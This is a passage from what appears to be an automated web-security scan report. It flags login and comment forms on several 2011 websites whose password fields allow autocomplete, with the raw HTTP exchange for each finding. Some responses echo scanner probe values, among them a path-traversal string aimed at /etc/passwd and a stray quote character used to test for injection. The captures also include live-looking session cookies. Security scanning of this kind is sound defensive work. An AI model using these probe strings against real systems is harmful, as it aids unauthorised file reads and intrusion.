<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3c.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html>
<head>

...[SNIP]...
<img src="/images/hd_my-jcp.gif" alt="My JCP" height="18" width="150">


<form name="login" method="post" action="https://www.jcp.org/en/user/login" >
    <input name="uri" value="/en/home/index" type="hidden">
...[SNIP]...
<td><input type="password" name="password" style="width:52px" class="form" value="" onkeypress="return handle_keypress(this, event)"></td>
...[SNIP]...

13.23. http://www.jcp.org/en/jsr/detail  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.jcp.org
Path:   /en/jsr/detail

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /en/jsr/detail?id=234 HTTP/1.1
Host: www.jcp.org
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.ibm.com/developerworks/java/find/standards/

Response

HTTP/1.1 200 OK
Server: Sun-Java-System-Web-Server/7.0
Date: Fri, 16 Sep 2011 19:56:53 GMT
Content-type: text/html;charset=ISO-8859-1
Content-Length: 35759


<!-- ** BEGIN: header.jsp ** //-->


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3c.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html>
<head>

...[SNIP]...
<img src="/images/hd_my-jcp.gif" alt="My JCP" height="18" width="150">


<form name="login" method="post" action="https://www.jcp.org/en/user/login" >
    <input name="uri" value="/en/jsr/detail?id=234" type="hidden">
...[SNIP]...
<td><input type="password" name="password" style="width:52px" class="form" value="" onkeypress="return handle_keypress(this, event)"></td>
...[SNIP]...

13.24. https://www.mailjet.com/signup  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.mailjet.com
Path:   /signup

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

POST /signup HTTP/1.1
Host: www.mailjet.com
Connection: keep-alive
Referer: http://www.mailjet.com/pricing
Content-Length: 10
Cache-Control: max-age=0
Origin: http://www.mailjet.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: affiliate=US-EN-smtp; mail_session=ue8DwvgMWj3limxfE4emkc%2Bezm%2B9mVnU%2FVoqCwNRZihPBS2aHbLPcJsh6zMrtsk5VBdWC2Q4%2FkY28R9i6SSa8dGAVUF8%2FPHumHv5F7VKYeMBcuJ3ocAQC8%2F1zpjTEa2eAIF2%2Fd1MaVsJjlYd%2BEvlsPy4Bruem8u21CL9yz8Ap%2Bo%2BCyjRIR52HCoEp7Gk2hMyvFZOK%2Fjx%2BGyh7%2Fsu8NFSZJ6LqVEMBAyL0NbwqKufi7iGB%2Fv%2F9tP9%2BJn57nRT7jf0OSu%2BSPaMMJ8CfmvGgjKuJr3Z3pjiI0Og8n2P%2BMDPxM5rZyhpW1H5bV6WiztfbkT5g%2BTxq5Sr9hjD093jyLRosfaux9DQuY9RcGBtBWydBnI%2FakIBZf1Gn%2FuhZ530ibuwBdDE3AAckB%2BX%2BQrsXYlox4bwiU%2BKUBCyOImviEfwVersfFPKJQTWs9BG6BLGawt5EAPShjQ3ZpGsRqD6D4DgBt8uEV0jSSUO5Nj9HsCmW6vnbM9Bc%2BhVI8FqYz2j4YkPtqWtgVhuS41Vo00JKJGreh2otpfEl3yl5R6F7KRY3%2BGclQqwvpHsWkNErB2NRzbFk4I3S%2FINHLVFnH2fvlkerYTMa%2B6iqgaqFGiaNLmKiqxdhh5hbqRCvPphR8CMT7hL; __utma=176514170.637056612.1316204845.1316216714.1316228159.3; __utmb=176514170.3.10.1316228159; __utmc=176514170; __utmz=176514170.1316228159.3.3.utmgclid=CKqV0feJoqsCFQdzgwod6j2wjw|utmccn=(not%20set)|utmcmd=(not%20set)|utmctr=smtp%20server

plan_id=38

Response

HTTP/1.1 200 OK
Date: Fri, 16 Sep 2011 21:55:01 GMT
Server: MJWS/1.0
Set-Cookie: mail_session=iQluRDaaB5M5AYtNJtKxLETKPFlyZG2Bb7aOz31g0XcJh051qecDn7WucsCQ5sPWMgov3crx%2Fe%2FVKHsfCKjgl0ts693dBbaw%2Bn8Z%2FZBRorc9S8yidBGGXRaEhLryAJRKXu8%2BmD5MfSSdUTArbPeuXqQTjl2%2Bz9Sps1DERl3gEQpRfzJHQU4%2FwSwXV%2FxG%2F%2B%2FxrLfIRvU4YGR9sNKRhV7Tp8y6xVR%2F406%2FF0NJNO84XVNcH7wVgIoZ%2BDtc6ZqtqYfZNbZ%2Ffsn12Ti6F3wqJfDXrfqEvwXlxxkIL3LWxFPMBsj6GRMSN5Beq9y%2BPikxBZWSpq8SNFZCwRQuOf2iioO708BZnv4AmSVUO2TA2qNfgYDSH75LdyKerW%2BnqWtmWbNib2Ke0irqnRb2LZXI7vbN%2FqlLnObWTqNDuveaarqUwcND3a%2FSRhy9MB5hAXw5SRtmg69SfaKU5IXFco%2F3%2B7CnWJ%2F%2F7VWiEY9c4oqHIUD7f6HMgacyF5JKG%2BefqhRdjC8skgLWP1T%2F07KLzZIrP0dZRJgsTMBLpI%2FYkzvF6CxdxpufVXy5MYalpKk2AIm85yqTw1398l%2Fx3tDNeDOW8EJ4D6%2Fj86oVOWSL2aNXti%2FfnM7wXf2BD9wgdi6H8bNR5Xbf; expires=Fri, 23-Sep-2011 21:55:01 GMT; path=/; domain=.mailjet.com
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 9167

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
   <title>Sign up for a free - mailjet.
...[SNIP]...
<div id="main">
   
   
   <form action="https://www.mailjet.com/signup" method="post" class="form" style="width: 600px; float: left; margin: 30px 0 0 20px;">


<input type="hidden" name="plan_id" value="38" />
...[SNIP]...
<td><input type="password" name="password" value="" id="password" maxlength="128" size="30" /></td>
...[SNIP]...
<td><input type="password" name="confirm_password" value="" id="confirm_password" maxlength="128" size="30" /></td>
...[SNIP]...

13.25. http://www.ted.com/js/library.min.js  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.ted.com
Path:   /js/library.min.js

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /js/library.min.js?1316119359 HTTP/1.1
Host: www.ted.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.ted.com/webcast/archive/event/ibmwatson
Cookie: symfony=6rh1uq799n643l7plr6irjcis1

Response

HTTP/1.1 200 OK
Server: nginx
Date: Fri, 16 Sep 2011 19:54:13 GMT
Content-Type: application/x-javascript
Last-Modified: Thu, 15 Sep 2011 20:41:52 GMT
Connection: keep-alive
Expires: Sun, 16 Oct 2011 19:54:13 GMT
Cache-Control: max-age=2592000
Content-Length: 254325

var sponsor_popover={_init:function(){this.element.height(this._getData("adSpace_height"));this.payload=this._getData("payload");this.setup_img();this.setup_tracking();if(this.payload.video.length){th
...[SNIP]...
</p><form name="form_signin" id="form_signin" method="post" action="/session"><div class="clearfix">
...[SNIP]...
</label><input type="password" name="users[password]" id="users_password" value="" class="text" /></div>
...[SNIP]...

13.26. http://www.tmz.com/2011/09/02/ncis-actor-my-neighbor-went-off-about-my-dead-mother-david-fisher-self-defense-police/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.tmz.com
Path:   /2011/09/02/ncis-actor-my-neighbor-went-off-about-my-dead-mother-david-fisher-self-defense-police/

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /2011/09/02/ncis-actor-my-neighbor-went-off-about-my-dead-mother-david-fisher-self-defense-police/ HTTP/1.1
Host: www.tmz.com
Proxy-Connection: keep-alive
Referer: http://traffic.outbrain.com/network/redir?key=467a26e36b344d031207fb454f356be4&rdid=231534154&type=YLD_def_ch&in-site=true&req_id=da23b34cfa8657c71e50520363d1bbbe&agent=blog_JS_rec&recMode=4&reqType=1&wid=100&imgType=0&refPub=347&prs=false&scp=false&version=42206&idx=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2739F79705012FA3-6000010200347A89[CE]; __qca=P0-1573572205-1316238805525; s_wb_ftcv=Sep2011%3AADID%3Ahero2; phpsessionid=dg1s7ica0oaontqmjt4chg0ta2; s_cc=true; s_campaign=hero3; s_wb_current=cpvisitor; s_sq=wbrostmz%3D%2526pid%253DMichaele%252520Salahi%252520--%252520%252526%252523039%25253BWild%252520Sex%252526%252523039%25253B%252520Claims%252520with%252520Journey%252520Guitarist%252520%25257C%252520TMZ.com%2526pidt%253D1%2526oid%253Dhttp%25253A//www.tmz.com/2011/09/02/ncis-actor-my-neighbor-went-off-about-my-dead-mother-david-fisher-s_1%2526oidt%253D1%2526ot%253DA%2526oi%253D1

Response

HTTP/1.0 200 OK
Date: Sat, 17 Sep 2011 01:00:18 GMT
Server: Apache
X-Powered-By: Crowd Fusion
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Sat, 17 Sep 2011 01:00:18 GMT
Set-Cookie: phpsessionid=dg1s7ica0oaontqmjt4chg0ta2fb562eff7c43ff78cfa8bd07; expires=Sun, 20-Feb-2028 01:00:18 GMT; path=/; domain=www.tmz.com
Vary: Accept-Encoding
Content-Length: 112256
Connection: close
Content-Type: text/html; charset="utf-8"
Set-Cookie: SERVERID=; Expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:meebo="http://www.meebo.com/
...[SNIP]...
<div id="comments">

<form id="commentform" action="#commentform" name="commentform" method="post" onsubmit="return commentForm.validate({facebook:{perms:'publish_stream,user_likes'}});">
   <div id="cmttabs">
...[SNIP]...
<br />
           <input id="C_AuthorPass" type="password" class="formtext" name="AuthorPassword" value=""/><br />
...[SNIP]...

13.27. http://www.tmz.com/2011/09/15/michaele-salahi-journey-neal-schon-affair-years-in-the-making-tareq-cheating-marriage-white-house-crashers-real-housewives-of-dc/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.tmz.com
Path:   /2011/09/15/michaele-salahi-journey-neal-schon-affair-years-in-the-making-tareq-cheating-marriage-white-house-crashers-real-housewives-of-dc/

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /2011/09/15/michaele-salahi-journey-neal-schon-affair-years-in-the-making-tareq-cheating-marriage-white-house-crashers-real-housewives-of-dc/?adid=hero3 HTTP/1.1
Host: www.tmz.com
Proxy-Connection: keep-alive
Referer: http://www.tmz.com/2011/09/16/ron-artest-name-change-official-metta-world-peace-legal-judge-petition-granted-lakers/?adid=hero2
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2739F79705012FA3-6000010200347A89[CE]; __qca=P0-1573572205-1316238805525; phpsessionid=dg1s7ica0oaontqmjt4chg0ta2; s_cc=true; s_wb_ftcv=Sep2011%3AADID%3Ahero2; s_campaign=hero2; s_wb_current=cpvisitor; s_sq=wbrostmz%3D%2526pid%253DRon%252520Artest%252520--%252520Name%252520Change%252520Official%252520...%252520Say%252520Hello%252520to%252520World%252520Peace%252520%25257C%252520TMZ.com%2526pidt%253D1%2526oid%253Dhttp%25253A//www.tmz.com/2011/09/15/michaele-salahi-journey-neal-schon-affair-years-in-the-making-tareq-ch%2526ot%253DA

Response

HTTP/1.0 200 OK
Date: Sat, 17 Sep 2011 00:58:47 GMT
Server: Apache
X-Powered-By: Crowd Fusion
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Sat, 17 Sep 2011 00:58:47 GMT
Set-Cookie: phpsessionid=dg1s7ica0oaontqmjt4chg0ta2fb562eff1d45dc9035b97879; expires=Sun, 20-Feb-2028 00:58:47 GMT; path=/; domain=www.tmz.com
Vary: Accept-Encoding
Content-Length: 115459
Connection: close
Content-Type: text/html; charset="utf-8"
Set-Cookie: SERVERID=; Expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:meebo="http://www.meebo.com/
...[SNIP]...
<div id="comments">

<form id="commentform" action="#commentform" name="commentform" method="post" onsubmit="return commentForm.validate({facebook:{perms:'publish_stream,user_likes'}});">
   <div id="cmttabs">
...[SNIP]...
<br />
           <input id="C_AuthorPass" type="password" class="formtext" name="AuthorPassword" value=""/><br />
...[SNIP]...

13.28. http://www.tmz.com/2011/09/16/justin-timberlake-not-my-penis-mila-kunis-texts-hacked-hacker-laying-in-bed-wearing-panties-on-head-leaked-pictures-explicit-cell-phone/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.tmz.com
Path:   /2011/09/16/justin-timberlake-not-my-penis-mila-kunis-texts-hacked-hacker-laying-in-bed-wearing-panties-on-head-leaked-pictures-explicit-cell-phone/

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /2011/09/16/justin-timberlake-not-my-penis-mila-kunis-texts-hacked-hacker-laying-in-bed-wearing-panties-on-head-leaked-pictures-explicit-cell-phone/?adid=hero1 HTTP/1.1
Host: www.tmz.com
Proxy-Connection: keep-alive
Referer: http://www.tmz.com/2011/09/02/ncis-actor-my-neighbor-went-off-about-my-dead-mother-david-fisher-self-defense-police/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2739F79705012FA3-6000010200347A89[CE]; __qca=P0-1573572205-1316238805525; s_wb_ftcv=Sep2011%3AADID%3Ahero2; s_campaign=hero3; phpsessionid=dg1s7ica0oaontqmjt4chg0ta2; s_cc=true; s_wb_current=cpvisitor; s_sq=wbrostmz%3D%2526pid%253D%252526%252523039%25253BNCIS%252526%252523039%25253B%252520Actor%252520--%252520Dead%252520Mother%252520Insult%252520Led%252520to%252520Violence%252520%25257C%252520TMZ.com%2526pidt%253D1%2526oid%253Dhttp%25253A//www.tmz.com/2011/09/16/justin-timberlake-not-my-penis-mila-kunis-texts-hacked-hacker-laying-i%2526ot%253DA

Response

HTTP/1.0 200 OK
Date: Sat, 17 Sep 2011 01:00:46 GMT
Server: Apache
X-Powered-By: Crowd Fusion
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Sat, 17 Sep 2011 01:00:46 GMT
Set-Cookie: phpsessionid=dg1s7ica0oaontqmjt4chg0ta2fb562effac2cf8f69d82c880; expires=Sun, 20-Feb-2028 01:00:46 GMT; path=/; domain=www.tmz.com
Vary: Accept-Encoding
Content-Length: 115860
Connection: close
Content-Type: text/html; charset="utf-8"
Set-Cookie: SERVERID=; Expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:meebo="http://www.meebo.com/
...[SNIP]...
<div id="comments">

<form id="commentform" action="#commentform" name="commentform" method="post" onsubmit="return commentForm.validate({facebook:{perms:'publish_stream,user_likes'}});">
   <div id="cmttabs">
...[SNIP]...
<br />
           <input id="C_AuthorPass" type="password" class="formtext" name="AuthorPassword" value=""/><br />
...[SNIP]...

13.29. http://www.tmz.com/2011/09/16/nancy-grace-dancing-tmz-live-video-partner-tristan-macmanus-dancing-with-the-stars/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.tmz.com
Path:   /2011/09/16/nancy-grace-dancing-tmz-live-video-partner-tristan-macmanus-dancing-with-the-stars/

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /2011/09/16/nancy-grace-dancing-tmz-live-video-partner-tristan-macmanus-dancing-with-the-stars/ HTTP/1.1
Host: www.tmz.com
Proxy-Connection: keep-alive
Referer: http://www.tmz.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; s_vi=[CS]v1|2739F79705012FA3-6000010200347A89[CE]; __qca=P0-1573572205-1316238805525; s_sq=wbrostmz%3D%2526pid%253DCelebrity%252520Gossip%252520%25257C%252520Entertainment%252520News%252520%25257C%252520Celebrity%252520News%252520%25257C%252520TMZ.com%2526pidt%253D1%2526oid%253Dhttp%25253A//www.tmz.com/2011/09/16/nancy-grace-dancing-tmz-live-video-partner-tristan-macmanus-dancing_1%2526oidt%253D1%2526ot%253DA%2526oi%253D1

Response

HTTP/1.0 200 OK
Date: Sat, 17 Sep 2011 00:56:17 GMT
Server: Apache
X-Powered-By: Crowd Fusion
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Sat, 17 Sep 2011 00:56:18 GMT
Set-Cookie: phpsessionid=dg1s7ica0oaontqmjt4chg0ta2; expires=Sun, 20-Feb-2028 00:56:17 GMT; path=/; domain=www.tmz.com
Vary: Accept-Encoding
Content-Length: 112027
Connection: close
Content-Type: text/html; charset="utf-8"
Set-Cookie: SERVERID=; Expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:meebo="http://www.meebo.com/
...[SNIP]...
<div id="comments">

<form id="commentform" action="#commentform" name="commentform" method="post" onsubmit="return commentForm.validate({facebook:{perms:'publish_stream,user_likes'}});">
   <div id="cmttabs">
...[SNIP]...
<br />
           <input id="C_AuthorPass" type="password" class="formtext" name="AuthorPassword" value=""/><br />
...[SNIP]...

13.30. http://www.tmz.com/2011/09/16/ron-artest-name-change-official-metta-world-peace-legal-judge-petition-granted-lakers/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.tmz.com
Path:   /2011/09/16/ron-artest-name-change-official-metta-world-peace-legal-judge-petition-granted-lakers/

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /2011/09/16/ron-artest-name-change-official-metta-world-peace-legal-judge-petition-granted-lakers/?adid=hero2 HTTP/1.1
Host: www.tmz.com
Proxy-Connection: keep-alive
Referer: http://www.tmz.com/2011/09/16/nancy-grace-dancing-tmz-live-video-partner-tristan-macmanus-dancing-with-the-stars/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2739F79705012FA3-6000010200347A89[CE]; __qca=P0-1573572205-1316238805525; phpsessionid=dg1s7ica0oaontqmjt4chg0ta2; s_cc=true; s_sq=wbrostmz%3D%2526pid%253DNancy%252520Grace%252520--%252520RUMPSHAKIN%252526%252523039%25253B%252520in%252520the%252520TMZ%252520Ballroom%252521%252521%252520%25257C%252520TMZ.com%2526pidt%253D1%2526oid%253Dhttp%25253A//www.tmz.com/2011/09/16/ron-artest-name-change-official-metta-world-peace-legal-judge-petit_2%2526oidt%253D1%2526ot%253DA%2526oi%253D1

Response

HTTP/1.0 200 OK
Date: Sat, 17 Sep 2011 00:58:11 GMT
Server: Apache
X-Powered-By: Crowd Fusion
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Sat, 17 Sep 2011 00:58:11 GMT
Set-Cookie: phpsessionid=dg1s7ica0oaontqmjt4chg0ta2; expires=Sun, 20-Feb-2028 00:58:11 GMT; path=/; domain=www.tmz.com
Vary: Accept-Encoding
Content-Length: 111374
Connection: close
Content-Type: text/html; charset="utf-8"
Set-Cookie: SERVERID=; Expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:meebo="http://www.meebo.com/
...[SNIP]...
<div id="comments">

<form id="commentform" action="#commentform" name="commentform" method="post" onsubmit="return commentForm.validate({facebook:{perms:'publish_stream,user_likes'}});">
   <div id="cmttabs">
...[SNIP]...
<br />
           <input id="C_AuthorPass" type="password" class="formtext" name="AuthorPassword" value=""/><br />
...[SNIP]...

13.31. http://www.tmz.com/signin/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.tmz.com
Path:   /signin/

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /signin/ HTTP/1.1
Host: www.tmz.com
Proxy-Connection: keep-alive
Referer: http://www.tmz.com/2011/09/16/justin-timberlake-not-my-penis-mila-kunis-texts-hacked-hacker-laying-in-bed-wearing-panties-on-head-leaked-pictures-explicit-cell-phone/?adid=hero1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2739F79705012FA3-6000010200347A89[CE]; __qca=P0-1573572205-1316238805525; s_wb_ftcv=Sep2011%3AADID%3Ahero2; phpsessionid=dg1s7ica0oaontqmjt4chg0ta2; s_cc=true; s_campaign=hero1; s_wb_current=cpvisitor; s_sq=wbrostmz%3D%2526pid%253DJustin%252520Timberlake%25253A%252520%252520Not%252520My%252520Penis%252521%252520%25257C%252520TMZ.com%2526pidt%253D1%2526oid%253Dhttp%25253A//www.tmz.com/signin/_1%2526oidt%253D1%2526ot%253DA%2526oi%253D1

Response

HTTP/1.0 200 OK
Date: Sat, 17 Sep 2011 01:02:07 GMT
Server: Apache
X-Powered-By: Crowd Fusion
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Sat, 17 Sep 2011 01:02:07 GMT
Set-Cookie: phpsessionid=dg1s7ica0oaontqmjt4chg0ta2%2527; expires=Sun, 20-Feb-2028 01:02:07 GMT; path=/; domain=www.tmz.com
Vary: Accept-Encoding
Content-Length: 49975
Connection: close
Content-Type: text/html; charset="utf-8"
Set-Cookie: SERVERID=; Expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<script type="text
...[SNIP]...
</h2>


<form id="signin-form" method="post">
       <p>
...[SNIP]...
<div><input type="password" name="Password" id="Password" class="form" size="50" /></div>
...[SNIP]...

13.32. http://www.toofab.com/2011/09/15/ashlee-simpson-vincent-piazza-boardwalk-empire-premiere-photos/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.toofab.com
Path:   /2011/09/15/ashlee-simpson-vincent-piazza-boardwalk-empire-premiere-photos/

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /2011/09/15/ashlee-simpson-vincent-piazza-boardwalk-empire-premiere-photos/ HTTP/1.1
Host: www.toofab.com
Proxy-Connection: keep-alive
Referer: http://www.toofab.com/category/celeb-couples/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1777464361-1316238721670; phpsessionid=iktc8fndah8vc0ik7ng8p5ghj4; s_cc=true; s_sq=wbrostoofab%3D%2526pid%253DCeleb%252520Couples%252520%25257C%252520tooFab%252521%2526pidt%253D1%2526oid%253Dhttp%25253A//www.toofab.com/2011/09/15/ashlee-simpson-vincent-piazza-boardwalk-empire-premiere-photos/%2526ot%253DA

Response

HTTP/1.0 200 OK
Date: Sat, 17 Sep 2011 01:08:42 GMT
Server: Apache
X-Powered-By: Crowd Fusion
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Sat, 17 Sep 2011 01:08:42 GMT
Set-Cookie: phpsessionid=iktc8fndah8vc0ik7ng8p5ghj4..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd; expires=Sun, 20-Feb-2028 01:08:42 GMT; path=/; domain=www.toofab.com
Vary: Accept-Encoding
Content-Length: 41681
Connection: close
Content-Type: text/html; charset="utf-8"
Set-Cookie: SERVERID=; Expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<div class="commentbox">
<form id="comment-form" action="#commentform" name="commentform" method="post" data-fb="{perms:'publish_stream,user_likes'}">
   <!--
   <div id="cmttabs">
...[SNIP]...
<br />
           <input id="C_AuthorPass" type="password" class="formtext" name="AuthorPassword" value=""/><br />
...[SNIP]...

13.33. http://www.toofab.com/2011/09/16/exclusive-melissa-rivers-splits-with-boyfriend/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.toofab.com
Path:   /2011/09/16/exclusive-melissa-rivers-splits-with-boyfriend/

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /2011/09/16/exclusive-melissa-rivers-splits-with-boyfriend/ HTTP/1.1
Host: www.toofab.com
Proxy-Connection: keep-alive
Referer: http://www.toofab.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; __qca=P0-1777464361-1316238721670; s_sq=wbrostoofab%3D%2526pid%253DTooFab%252520Homepage%252520%25255B%25255D%2526pidt%253D1%2526oid%253Dhttp%25253A//www.toofab.com/2011/09/16/exclusive-melissa-rivers-splits-with-boyfriend/%2526ot%253DA

Response

HTTP/1.0 200 OK
Date: Sat, 17 Sep 2011 00:50:59 GMT
Server: Apache
X-Powered-By: Crowd Fusion
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Sat, 17 Sep 2011 00:50:59 GMT
